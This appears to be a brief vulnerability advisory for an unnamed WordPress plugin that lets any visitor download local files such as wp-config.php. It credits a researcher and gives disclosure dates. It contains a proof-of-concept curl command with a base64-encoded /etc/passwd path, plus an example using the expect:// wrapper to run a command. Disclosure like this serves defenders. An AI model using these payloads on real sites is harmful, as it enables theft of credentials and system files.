The plugin allows any visitor to use its remote file download feature to download any local files, including sensitive ones like wp-config.php.
# Base64 encode your payload, for example # Base64(expect://id) -> ZXhwZWN0Oi8vaWQ= (requires the "expect" PECL extension to be installed) Base64(/etc/passwd) -> L2V0Yy9wYXNzd2Q= curl -v -d "dl=L2V0Yy9wYXNzd2Q=&size=200&type=text/plain" https://example.com/page
Raad Haddad of Cloudyrion GmbH
Raad Haddad of Cloudyrion GmbH
Yes
2022-07-12 (about 6 months ago)
2022-07-12 (about 6 months ago)
2022-08-22 (about 5 months ago)